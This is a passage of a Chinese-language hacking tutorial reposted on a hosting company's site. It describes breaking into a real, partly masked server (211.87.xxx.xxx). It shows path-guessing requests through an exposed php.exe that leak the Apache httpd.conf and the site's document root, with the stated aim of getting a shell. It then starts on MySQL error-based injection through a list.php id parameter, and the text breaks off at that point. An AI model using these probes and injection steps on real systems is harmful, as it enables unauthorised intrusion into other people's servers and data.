看紧你的3306端口,一次通过mysql的入侵
astdetect 呵呵,装的还是xp。 好了,我们可以猜测对方apache的conf文件的物理位置了 http://211.87.xxx.xxx/php/php.exe?c:\apache\conf\httpd.conf No input file specified. http://211.87.xxx.xxx/php/php.exe?d:\apache\conf\httpd.conf No input file specified. http://211.87.xxx.xxx/php/php.exe?e:\apache\conf\httpd.conf No input file specified. http://211.87.xxx.xxx/php/php.exe?c:\Program Files\apache\conf\httpd.conf No input file specified. http://211.87.xxx.xxx/php/php.exe?f:\apache\conf\httpd.conf 猜到了,返回了好多东西 找到我们想要的 # DocumentRoot: The directory out of which you will serve your # documents. By default, all requests are taken from this directory, but # symbolic links and aliases may be used to point to other locations. # DocumentRoot "D:\homepage" 看得出来对方的主目录是D:\homepage 下面的事就好办了,现在就想得到shell? 先别急,我们先来看看另一种方法 那就是利用mysql的错误 随便的浏览一下他的网页找到一处利用mysql的地方 http://211.87.xxx.xxx/skonline/study/list.php?id=14
|
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |